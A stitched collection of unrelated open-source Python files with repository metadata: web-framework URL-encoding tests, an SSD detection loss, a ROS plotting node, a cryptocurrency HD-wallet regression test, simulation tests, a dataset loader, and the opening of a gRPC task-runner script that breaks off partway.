bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# We have to use "urllib.parse.quote" here because the exact output
# differs on different Python versions because of how they handle
# invalid encoding sequences
self.assertEqual(
'http://localhost/%s' % quote('%83'),
event.metadata['request']['url']
)
def test_path_supports_emoji(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/😇'
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.configure_request(wsgi_environ=environ)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# You can validate this by using "encodeURIComponent" in a browser.
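        # ('😇' is U+1F607; its UTF-8 bytes F0 9F 98 87 percent-encode to
        # %F0%9F%98%87)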
self.assertEqual(
'http://localhost/%F0%9F%98%87',
event.metadata['request']['url']
)
def test_path_supports_non_ascii_characters(self):
import bugsnag.wsgi.middleware
environ = self.environ.copy()
environ['PATH_INFO'] = '/ôßłガ'
config = Configuration()
event = Event(
Exception("oops"),
config,
RequestConfiguration.get_instance()
)
bugsnag.configure_request(wsgi_environ=environ)
bugsnag.wsgi.middleware.add_wsgi_request_data_to_notification(
event
)
# You can validate this by using "encodeURIComponent" in a browser.
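        # (UTF-8 bytes: ô = C3 B4, ß = C3 9F, ł = C5 82, ガ = E3 82 AC)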
self.assertEqual(
'http://localhost/%C3%B4%C3%9F%C5%82%E3%82%AC',
event.metadata['request']['url']
)
if __name__ == '__main__':
unittest.main()
| avg_line_length: 26.614754 | max_line_length: 75 | alphanum_fraction: 0.59963 |

hexsha: 794db42d2be0a8f9178bec865ee17b1007677673 | size: 288 | ext: py | lang: Python
max_stars:  fdk_client/platform/models/StatsImported.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | ["MIT"] | count: null | events: null, null
max_issues: fdk_client/platform/models/StatsImported.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | ["MIT"] | count: null | events: null, null
max_forks:  fdk_client/platform/models/StatsImported.py | kavish-d/fdk-client-python | a1023eb530473322cb52e095fc4ceb226c1e6037 | ["MIT"] | count: null | events: null, null
"""Platform Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
class StatsImported(BaseSchema):
# Communication swagger.json
count = fields.Int(required=False)
| avg_line_length: 16 | max_line_length: 42 | alphanum_fraction: 0.732639 |

hexsha: 794db431c93c8398f9e9d36a557953856b80c14c | size: 4,952 | ext: py | lang: Python
max_stars:  layers/modules/multibox_loss.py | chosj95/SSD-Zoomed | 0e8fd9829406e6b903c974733cb6976b8e0fd968 | ["MIT"] | count: null | events: null, null
max_issues: layers/modules/multibox_loss.py | chosj95/SSD-Zoomed | 0e8fd9829406e6b903c974733cb6976b8e0fd968 | ["MIT"] | count: null | events: null, null
max_forks:  layers/modules/multibox_loss.py | chosj95/SSD-Zoomed | 0e8fd9829406e6b903c974733cb6976b8e0fd968 | ["MIT"] | count: null | events: null, null
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from data import coco as cfg
from ..box_utils import match, log_sum_exp
class MultiBoxLoss(nn.Module):
"""SSD Weighted Loss Function
Compute Targets:
1) Produce Confidence Target Indices by matching ground truth boxes
with (default) 'priorboxes' that have jaccard index > threshold parameter
(default threshold: 0.5).
2) Produce localization target by 'encoding' variance into offsets of ground
truth boxes and their matched 'priorboxes'.
3) Hard negative mining to filter the excessive number of negative examples
that comes with using a large number of default bounding boxes.
(default negative:positive ratio 3:1)
Objective Loss:
L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
weighted by α which is set to 1 by cross val.
Args:
c: class confidences,
l: predicted boxes,
g: ground truth boxes
N: number of matched default boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
"""
def __init__(self, num_classes, overlap_thresh, prior_for_matching,
bkg_label, neg_mining, neg_pos, neg_overlap, encode_target,
use_gpu=True):
super(MultiBoxLoss, self).__init__()
self.use_gpu = use_gpu
self.num_classes = num_classes
self.threshold = overlap_thresh
self.background_label = bkg_label
self.encode_target = encode_target
self.use_prior_for_matching = prior_for_matching
self.do_neg_mining = neg_mining
self.negpos_ratio = neg_pos
self.neg_overlap = neg_overlap
self.variance = cfg['variance']
def forward(self, predictions, targets):
"""Multibox Loss
Args:
predictions (tuple): A tuple containing loc preds, conf preds,
and prior boxes from SSD net.
conf shape: torch.size(batch_size,num_priors,num_classes)
loc shape: torch.size(batch_size,num_priors,4)
priors shape: torch.size(num_priors,4)
targets (tensor): Ground truth boxes and labels for a batch,
shape: [batch_size,num_objs,5] (last idx is the label).
"""
loc_data, conf_data, priors = predictions
num = loc_data.size(0)
priors = priors[:loc_data.size(1), :]
num_priors = (priors.size(0))
num_classes = self.num_classes
# match priors (default boxes) and ground truth boxes
loc_t = torch.Tensor(num, num_priors, 4)
conf_t = torch.LongTensor(num, num_priors)
for idx in range(num):
truths = targets[idx][:, :-1].data
labels = targets[idx][:, -1].data
defaults = priors.data
match(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
if self.use_gpu:
loc_t = loc_t.cuda()
conf_t = conf_t.cuda()
# wrap targets
loc_t = Variable(loc_t, requires_grad=False)
conf_t = Variable(conf_t, requires_grad=False)
pos = conf_t > 0
num_pos = pos.sum(dim=1, keepdim=True)
# Localization Loss (Smooth L1)
# Shape: [batch,num_priors,4]
pos_idx = pos.unsqueeze(pos.dim()).expand_as(loc_data)
loc_p = loc_data[pos_idx].view(-1, 4)
loc_t = loc_t[pos_idx].view(-1, 4)
        loss_l = F.smooth_l1_loss(loc_p, loc_t, reduction='sum')
# Compute max conf across batch for hard negative mining
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = log_sum_exp(batch_conf) - batch_conf.gather(1, conf_t.view(-1, 1))
# Hard Negative Mining
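        # (the double argsort below turns per-prior losses into ranks:
        # loss_idx orders priors by descending loss, and sorting those indices
        # again yields each prior's rank, so "idx_rank < num_neg" keeps the
        # num_neg highest-loss negatives in each image)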
loss_c[pos.view(-1,1)] = 0 # filter out pos boxes for now
loss_c = loss_c.view(num, -1)
_, loss_idx = loss_c.sort(1, descending=True)
_, idx_rank = loss_idx.sort(1)
num_pos = pos.long().sum(1, keepdim=True)
num_neg = torch.clamp(self.negpos_ratio*num_pos, max=pos.size(1)-1)
neg = idx_rank < num_neg.expand_as(idx_rank)
# Confidence Loss Including Positive and Negative Examples
pos_idx = pos.unsqueeze(2).expand_as(conf_data)
neg_idx = neg.unsqueeze(2).expand_as(conf_data)
conf_p = conf_data[(pos_idx+neg_idx).gt(0)].view(-1, self.num_classes)
targets_weighted = conf_t[(pos+neg).gt(0)]
        loss_c = F.cross_entropy(conf_p, targets_weighted, reduction='sum')
# Sum of losses: L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
N = num_pos.data.sum().double()
loss_l = loss_l.double()
loss_c = loss_c.double()
loss_l /= N
loss_c /= N
return loss_l, loss_c
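# A minimal smoke-test sketch (the 21-class VOC-style arguments are our
# assumption, not taken from this repository's training script):
#
#     criterion = MultiBoxLoss(num_classes=21, overlap_thresh=0.5,
#                              prior_for_matching=True, bkg_label=0,
#                              neg_mining=True, neg_pos=3, neg_overlap=0.5,
#                              encode_target=False, use_gpu=False)
#     loss_l, loss_c = criterion((loc_preds, conf_preds, priors), targets)
#     loss = loss_l + loss_c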
| avg_line_length: 41.266667 | max_line_length: 84 | alphanum_fraction: 0.622981 |

hexsha: 794db481e4ec975914252f90d9e72d526bdbfa44 | size: 4,524 | ext: py | lang: Python
max_stars:  mobile_bot/mobile_bot_ekf/scripts/plot_pose.py | benmo009/ros-simulations | dc25f285a06658f88a9852e349bffe9b4b505484 | ["MIT"] | count: null | events: null, null
max_issues: mobile_bot/mobile_bot_ekf/scripts/plot_pose.py | benmo009/ros-simulations | dc25f285a06658f88a9852e349bffe9b4b505484 | ["MIT"] | count: null | events: null, null
max_forks:  mobile_bot/mobile_bot_ekf/scripts/plot_pose.py | benmo009/ros-simulations | dc25f285a06658f88a9852e349bffe9b4b505484 | ["MIT"] | count: null | events: null, null
#!/usr/bin/env python
import rospy
import numpy as np
import matplotlib.pyplot as plt
from gazebo_msgs.srv import GetModelState
from geometry_msgs.msg import Pose
from tf.transformations import euler_from_quaternion
class PosePlotter:
def __init__(self, name):
# Initialize ROS node
rospy.init_node(name)
# Subscribe to gps topics
self.noisy_sub = rospy.Subscriber("/gps/noisy", Pose, self.noisy_gps_callback, queue_size=1)
self.true_sub = rospy.Subscriber("/gps/true", Pose, self.true_gps_callback, queue_size=1)
        self.odom_sub = rospy.Subscriber("/mobile_bot/dead_reckoning", Pose, self.odom_callback, queue_size=1)
        self.range_sub = rospy.Subscriber("/mobile_bot/range_sensor", Pose, self.range_callback, queue_size=1)
# Initialize dictionaries for storing gps data
self.noisy_data = {"t": [], "x": [], "y": [], "theta": []}
self.true_data = {"t": [], "x": [], "y": [], "theta": []}
self.odom_data = {"t": [], "x": [], "y": [], "theta": []}
self.range_data = {"t": [], "x": [], "y": [], "theta": []}
# Callback function for noisy GPS data
def noisy_gps_callback(self, data):
# Store the time, x, and y positions
self.noisy_data["t"].append(rospy.get_time())
self.noisy_data["x"].append(data.position.x)
self.noisy_data["y"].append(data.position.y)
# Convert quaternion data to euler angles to get orientation
q = data.orientation
theta = euler_from_quaternion([q.x, q.y, q.z, q.w])
theta = theta[2]
self.noisy_data["theta"].append(theta)
# Callback function for true GPS data
def true_gps_callback(self, data):
# Store the time, x, and y positions
self.true_data["t"].append(rospy.get_time())
self.true_data["x"].append(data.position.x)
self.true_data["y"].append(data.position.y)
# Convert quaternion data to euler angles to get orientation
q = data.orientation
theta = euler_from_quaternion([q.x, q.y, q.z, q.w])
theta = theta[2]
self.true_data["theta"].append(theta)
def odom_callback(self, data):
self.odom_data["t"].append(rospy.get_time())
self.odom_data["x"].append(data.position.x)
self.odom_data["y"].append(data.position.y)
self.odom_data["theta"].append(data.orientation.x)
def range_callback(self, data):
self.range_data["t"].append(rospy.get_time())
self.range_data["x"].append(data.position.x)
self.range_data["y"].append(data.position.y)
self.range_data["theta"].append(data.orientation.x)
    # Plot the collected pose data (true, odometry, and range estimates)
def plot(self):
fig, ax = plt.subplots(3,1)
ax[0].plot(self.true_data["t"], self.true_data["x"], label="True x")
ax[1].plot(self.true_data["t"], self.true_data["y"], label="True y")
ax[2].plot(self.true_data["t"], self.true_data["theta"], label="True $\\theta$")
# ax[0].plot(self.noisy_data["t"], self.noisy_data["x"], '--', label="Noisy x")
# ax[1].plot(self.noisy_data["t"], self.noisy_data["y"], '--', label="Noisy y")
# ax[2].plot(self.noisy_data["t"], self.noisy_data["theta"], '--', label="Noisy $\\theta$")
ax[0].plot(self.odom_data["t"], self.odom_data["x"], '--', label="Odom x")
ax[1].plot(self.odom_data["t"], self.odom_data["y"], '--', label="Odom y")
ax[2].plot(self.odom_data["t"], self.odom_data["theta"], '--', label="Odom $\\theta$")
ax[0].plot(self.range_data["t"], self.range_data["x"], '--', label="Range x")
ax[1].plot(self.range_data["t"], self.range_data["y"], '--', label="Range y")
ax[2].plot(self.range_data["t"], self.range_data["theta"], '--', label="Range $\\theta$")
for i in range(3):
ax[i].legend()
ax[i].set_xlabel("Time (s)")
ax[i].set_ylabel("Position")
plt.tight_layout()
plt.show()
if __name__ == "__main__":
try:
# Get sampling time from parameter server
if rospy.has_param("mobile_bot/plotter/sample_time"):
sample_time = rospy.get_param("mobile_bot/plotter/sample_time")
else:
sample_time = 30
# Start plotter node
plotter = PosePlotter("mobile_bot_pose_plotter")
# Define how long to collect data for.
rospy.sleep(sample_time)
        # Plot the collected pose data
plotter.plot()
except rospy.ROSInterruptException:
pass
| avg_line_length: 40.756757 | max_line_length: 110 | alphanum_fraction: 0.60588 |

hexsha: 794db5131ed61b290e05385c82f6b7e55acd7da8 | size: 4,992 | ext: py | lang: Python
max_stars:  qa/rpc-tests/wallet-hd.py | fg12347/smc | 15cac6c49e27c055d4f217ec31ad9923691051fe | ["MIT"] | count: null | events: null, null
max_issues: qa/rpc-tests/wallet-hd.py | fg12347/smc | 15cac6c49e27c055d4f217ec31ad9923691051fe | ["MIT"] | count: null | events: null, null
max_forks:  qa/rpc-tests/wallet-hd.py | fg12347/smc | 15cac6c49e27c055d4f217ec31ad9923691051fe | ["MIT"] | count: null | events: null, null
#!/usr/bin/env python2
# coding=utf-8
# ^^^^^^^^^^^^ TODO remove when supporting only Python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test Hierarchical Deterministic wallet function."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletHDTest(BitcoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = start_nodes(2, self.options.tmpdir, [['-usehd=0'], ['-usehd=1', '-keypool=0']])
self.is_network_split = False
connect_nodes_bi(self.nodes, 0, 1)
self.is_network_split=False
self.sync_all()
    def run_test(self):
tmpdir = self.options.tmpdir
# Make sure can't switch off usehd after wallet creation
stop_node(self.nodes[1],1)
try:
start_node(1, self.options.tmpdir, ['-usehd=0'])
raise AssertionError("Must not allow to turn off HD on an already existing HD wallet")
except Exception as e:
assert("smcd exited with status 1 during initialization" in str(e))
# assert_start_raises_init_error(1, self.options.tmpdir, ['-usehd=0'], 'already existing HD wallet')
# self.nodes[1] = start_node(1, self.options.tmpdir, self.node_args[1])
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
connect_nodes_bi(self.nodes, 0, 1)
# Make sure we use hd, keep chainid
chainid = self.nodes[1].getwalletinfo()['hdchainid']
assert_equal(len(chainid), 64)
# create an internal key
change_addr = self.nodes[1].getrawchangeaddress()
        change_addrV = self.nodes[1].validateaddress(change_addr)
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/0") #first internal child key
# Import a non-HD private key in the HD wallet
non_hd_add = self.nodes[0].getnewaddress()
self.nodes[1].importprivkey(self.nodes[0].dumpprivkey(non_hd_add))
# This should be enough to keep the master key and the non-HD key
self.nodes[1].backupwallet(tmpdir + "/hd.bak")
#self.nodes[1].dumpwallet(tmpdir + "/hd.dump")
        # Derive some HD addresses and remember the last one.
        # Also send funds to each address
self.nodes[0].generate(101)
hd_add = None
num_hd_adds = 300
for i in range(num_hd_adds):
hd_add = self.nodes[1].getnewaddress()
hd_info = self.nodes[1].validateaddress(hd_add)
assert_equal(hd_info["hdkeypath"], "m/44'/1'/0'/0/"+str(i+1))
assert_equal(hd_info["hdchainid"], chainid)
self.nodes[0].sendtoaddress(hd_add, 1)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(non_hd_add, 1)
self.nodes[0].generate(1)
# create an internal key (again)
change_addr = self.nodes[1].getrawchangeaddress()
        change_addrV = self.nodes[1].validateaddress(change_addr)
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/1") #second internal child key
self.sync_all()
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
print("Restore backup ...")
stop_node(self.nodes[1],1)
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/hd.bak", tmpdir + "/node1/regtest/wallet.dat")
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
#connect_nodes_bi(self.nodes, 0, 1)
# Assert that derivation is deterministic
hd_add_2 = None
        for i in range(num_hd_adds):
            hd_add_2 = self.nodes[1].getnewaddress()
            hd_info_2 = self.nodes[1].validateaddress(hd_add_2)
            assert_equal(hd_info_2["hdkeypath"], "m/44'/1'/0'/0/"+str(i+1))
            assert_equal(hd_info_2["hdchainid"], chainid)
assert_equal(hd_add, hd_add_2)
# Needs rescan
stop_node(self.nodes[1],1)
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0', '-rescan'])
#connect_nodes_bi(self.nodes, 0, 1)
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
        # send a tx and make sure it is using the internal chain for the change output
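        # (BIP44 paths read m / purpose' / coin_type' / account' / change / index,
        # so the "1" in the fourth position of m/44'/1'/0'/1 marks the internal
        # (change) chain)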
txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
        outs = self.nodes[1].decoderawtransaction(self.nodes[1].gettransaction(txid)['hex'])['vout']
keypath = ""
for out in outs:
if out['value'] != 1:
keypath = self.nodes[1].validateaddress(out['scriptPubKey']['addresses'][0])['hdkeypath']
assert_equal(keypath[0:13], "m/44'/1'/0'/1")
if __name__ == '__main__':
    WalletHDTest().main()
| avg_line_length: 43.789474 | max_line_length: 108 | alphanum_fraction: 0.638622 |

hexsha: 794db58b3c91bef74d65b5b1679ba23b8072e828 | size: 598 | ext: py | lang: Python
max_stars:  distributed/protocol/tests/test_numba.py | gforsyth/distributed | 6fe62774aa7ad585cf2231ca6475f70fdc1cec24 | ["BSD-3-Clause"] | count: null | events: null, null
max_issues: distributed/protocol/tests/test_numba.py | gforsyth/distributed | 6fe62774aa7ad585cf2231ca6475f70fdc1cec24 | ["BSD-3-Clause"] | count: null | events: null, null
max_forks:  distributed/protocol/tests/test_numba.py | gforsyth/distributed | 6fe62774aa7ad585cf2231ca6475f70fdc1cec24 | ["BSD-3-Clause"] | count: null | events: null, null
from distributed.protocol import serialize, deserialize
import pytest
cuda = pytest.importorskip("numba.cuda")
np = pytest.importorskip("numpy")
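# importorskip makes pytest skip this entire module (instead of erroring) when
# numba or numpy is not available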
@pytest.mark.parametrize("dtype", ["u1", "u4", "u8", "f4"])
def test_serialize_numba(dtype):
ary = np.arange(100, dtype=dtype)
x = cuda.to_device(ary)
header, frames = serialize(x, serializers=("cuda", "dask", "pickle"))
y = deserialize(header, frames, deserializers=("cuda", "dask", "pickle", "error"))
hx = np.empty_like(ary)
hy = np.empty_like(ary)
x.copy_to_host(hx)
y.copy_to_host(hy)
assert (hx == hy).all()
| avg_line_length: 29.9 | max_line_length: 86 | alphanum_fraction: 0.667224 |

hexsha: 794db66e44edd6cf54aee6795ef3619dd22e5e94 | size: 6,973 | ext: py | lang: Python
max_stars:  PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py | juliangarcia/pyevodyn | 79091f0a50e1dd834b8697e3158dfe75acd2efc1 | ["BSD-2-Clause-FreeBSD"] | count: 1 | events: 2020-09-22T07:10:49.000Z, 2020-09-22T07:10:49.000Z
max_issues: PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py | juliangarcia/pyevodyn | 79091f0a50e1dd834b8697e3158dfe75acd2efc1 | ["BSD-2-Clause-FreeBSD"] | count: null | events: null, null
max_forks:  PyEvoDyn/pyevodyn/tests/moran_process_simulation_test.py | juliangarcia/pyevodyn | 79091f0a50e1dd834b8697e3158dfe75acd2efc1 | ["BSD-2-Clause-FreeBSD"] | count: 4 | events: 2016-12-20T03:05:42.000Z, 2021-01-01T09:01:45.000Z
'''
Created on Oct 3, 2012
@author: garcia
'''
import unittest
from pyevodyn import games
import numpy as np
from pyevodyn.simulation import MoranProcess
import pyevodyn.simulation as sim
class Test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def mock_up_payoff_function_everybody_gets_one(self, population_array):
return np.ones(len(population_array))
    def test_custom_fitness(self):
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=5,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([1, 2, 3, 4, 5])
np.testing.assert_array_equal(mp.payoff_function(pop), np.ones(len(pop)), "Custom function payoff failed")
def test_game_fitness(self):
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=games.neutral_game(2), payoff_function=None, number_of_strategies=2,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([5, 5])
np.testing.assert_array_equal(mp.payoff_function(pop), np.ones(len(pop)),
"Neutral game test function payoff failed")
mp = sim.MoranProcess(population_size=10, intensity_of_selection=0.001,
game_matrix=np.zeros(shape=(2, 2)), payoff_function=None, number_of_strategies=2,
fitness_mapping='lin', mutation_probability=0.001)
pop = np.array([5, 5])
        np.testing.assert_array_equal(mp.payoff_function(pop), np.zeros(len(pop)),
                                      "Zero game test function payoff failed")
def test_step_invariable_in_population_size(self):
for _ in range(0, 3):
# random game 2x2, random mutation rate, random intensity
mp = sim.MoranProcess(population_size=10, intensity_of_selection=np.random.rand(),
game_matrix=np.random.rand(2, 2), number_of_strategies=2,
fitness_mapping='exp', mutation_probability=np.random.rand())
str1 = np.random.randint(0, 10)
pop = [str1, 10 - str1]
for __ in range(0, 20):
pop = mp.step(pop, mutation_step=np.random.randint(0, 2))[0]
# print pop
self.assertEqual(sum(pop), 10, "Pop size should always be ten!")
def test_initialization(self):
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=None,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.001,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=None,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=np.ones(5), payoff_function=None,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=None, fitness_mapping='exp', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
try:
sim.MoranProcess(population_size=10, intensity_of_selection=0.05,
game_matrix=None, payoff_function=self.mock_up_payoff_function_everybody_gets_one,
number_of_strategies=5, fitness_mapping='hola', mutation_probability=0.01,
mutation_kernel=None)
except ValueError as err:
print('Error {} tested OK.'.format(err))
self.assertTrue(True, 'No exception raised!')
return
self.assertTrue(False, 'No exception raised')
def test_if_a_type_is_not_there_it_never_shows_up(self):
# np.random.seed(999)
for i in range(0, 3):
pop = np.random.randint(1, 10, 5) # random population with 5 strategies
zero_element = np.random.randint(0, 5)
pop[zero_element] = 0
pop_size = np.sum(pop)
mp = MoranProcess(population_size=pop_size,
intensity_of_selection=1.0, game_matrix=np.random.rand(5, 5),
number_of_strategies=5, fitness_mapping='exp', mutation_probability=0.1)
for j in range(0, 1000):
pop = mp.step(pop, mutation_step=False)[0]
self.assertEqual(pop[zero_element], 0, "Type " + str(zero_element) + " showed up in population " + str(
pop) + " at iteration " + str(i) + " " + str(j))
def test_fixation_of_neutral_mutant(self):
number_of_strategies_value = 2
number_of_samples_ = 10000
for _ in range(0, 5):
pop_size = np.random.randint(2, 11)
mp = MoranProcess(population_size=pop_size,
intensity_of_selection=0.0,
game_matrix=np.random.rand(number_of_strategies_value, number_of_strategies_value),
number_of_strategies=number_of_strategies_value, fitness_mapping='exp',
mutation_probability=0.1)
fix = mp.simulate_fixation_probability(0, 1, number_of_samples=number_of_samples_, seed=None)
            np.testing.assert_allclose(fix, 1.0 / pop_size, rtol=0.01, atol=0.01, err_msg="Neutral fixation probability mismatch", verbose=True)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
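# Hedged sketch (not part of the test suite above): one birth-death update of a
# neutral Moran process, illustrating what MoranProcess.step conceptually does
# when selection is absent; the function name is illustrative only.
def _neutral_moran_step_sketch(pop):
    import numpy as np
    pop = np.array(pop, dtype=int)
    freq = pop / float(pop.sum())               # neutral: reproduction ~ frequency
    birth = np.random.choice(len(pop), p=freq)  # one individual reproduces
    death = np.random.choice(len(pop), p=freq)  # one individual dies at random
    pop[birth] += 1
    pop[death] -= 1
    return pop                                  # population size is conserved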
| 51.272059
| 119
| 0.597591
|
794db6894239ea4f65ede0a38067e7d98f5164f0
| 3,460
|
py
|
Python
|
datasets/opinosis/opinosis.py
|
dkajtoch/datasets
|
12ef7f0d541a5aca5b29ebc2dddf5e1214f0e3e9
|
[
"Apache-2.0"
] | 9
|
2021-04-26T14:43:52.000Z
|
2021-11-08T09:47:24.000Z
|
datasets/opinosis/opinosis.py
|
jramapuram/huggingface_datasets
|
62c7ac0783a00bdc1192b6a75439a65d522b6cbc
|
[
"Apache-2.0"
] | null | null | null |
datasets/opinosis/opinosis.py
|
jramapuram/huggingface_datasets
|
62c7ac0783a00bdc1192b6a75439a65d522b6cbc
|
[
"Apache-2.0"
] | 3
|
2021-01-03T22:08:20.000Z
|
2021-08-12T20:09:39.000Z
|
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors and the HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Opinosis Opinion Dataset."""
from __future__ import absolute_import, division, print_function
import os
import datasets
_CITATION = """
@inproceedings{ganesan2010opinosis,
title={Opinosis: a graph-based approach to abstractive summarization of highly redundant opinions},
author={Ganesan, Kavita and Zhai, ChengXiang and Han, Jiawei},
booktitle={Proceedings of the 23rd International Conference on Computational Linguistics},
pages={340--348},
year={2010},
organization={Association for Computational Linguistics}
}
"""
_DESCRIPTION = """
The Opinosis Opinion Dataset consists of sentences extracted from reviews for 51 topics.
Topics and opinions are obtained from Tripadvisor, Edmunds.com and Amazon.com.
"""
_URL = "https://github.com/kavgan/opinosis-summarization/raw/master/OpinosisDataset1.0_0.zip"
_REVIEW_SENTS = "review_sents"
_SUMMARIES = "summaries"
class Opinosis(datasets.GeneratorBasedBuilder):
"""Opinosis Opinion Dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
_REVIEW_SENTS: datasets.Value("string"),
_SUMMARIES: datasets.features.Sequence(datasets.Value("string")),
}
),
supervised_keys=(_REVIEW_SENTS, _SUMMARIES),
homepage="http://kavita-ganesan.com/opinosis/",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
extract_path = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"path": extract_path},
),
]
def _generate_examples(self, path=None):
"""Yields examples."""
topics_path = os.path.join(path, "topics")
filenames = sorted(os.listdir(topics_path))
for filename in filenames:
file_path = os.path.join(topics_path, filename)
topic_name = filename.split(".txt")[0]
with open(file_path, "rb") as src_f:
input_data = src_f.read().decode("latin-1")
summaries_path = os.path.join(path, "summaries-gold", topic_name)
summary_lst = []
for summ_filename in sorted(os.listdir(summaries_path)):
file_path = os.path.join(summaries_path, summ_filename)
with open(file_path, "rb") as tgt_f:
data = tgt_f.read().strip().decode("latin-1")
summary_lst.append(data)
summary_data = summary_lst
yield filename, {_REVIEW_SENTS: input_data, _SUMMARIES: summary_data}
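# Usage sketch (illustrative; assumes the `datasets` library is installed and
# this builder is registered under the dataset name "opinosis"):
def _load_opinosis_sketch():
    import datasets
    ds = datasets.load_dataset("opinosis", split="train")
    first = ds[0]
    return first["review_sents"], first["summaries"]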
| 36.421053
| 101
| 0.665029
|
794db6e1be0e854c53f2116da18be815e2f22235
| 3,876
|
py
|
Python
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
tools/run_tests/task_runner.py
|
samotarnik/grpc
|
3278bdceda8030d5aa130f12765e5f07263c860d
|
[
"Apache-2.0"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs selected gRPC test/build tasks."""
from __future__ import print_function
import argparse
import multiprocessing
import sys
import artifacts.artifact_targets as artifact_targets
import artifacts.distribtest_targets as distribtest_targets
import artifacts.package_targets as package_targets
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
_TARGETS = []
_TARGETS += artifact_targets.targets()
_TARGETS += distribtest_targets.targets()
_TARGETS += package_targets.targets()
def _create_build_map():
"""Maps task names and labels to list of tasks to be built."""
target_build_map = dict([(target.name, [target]) for target in _TARGETS])
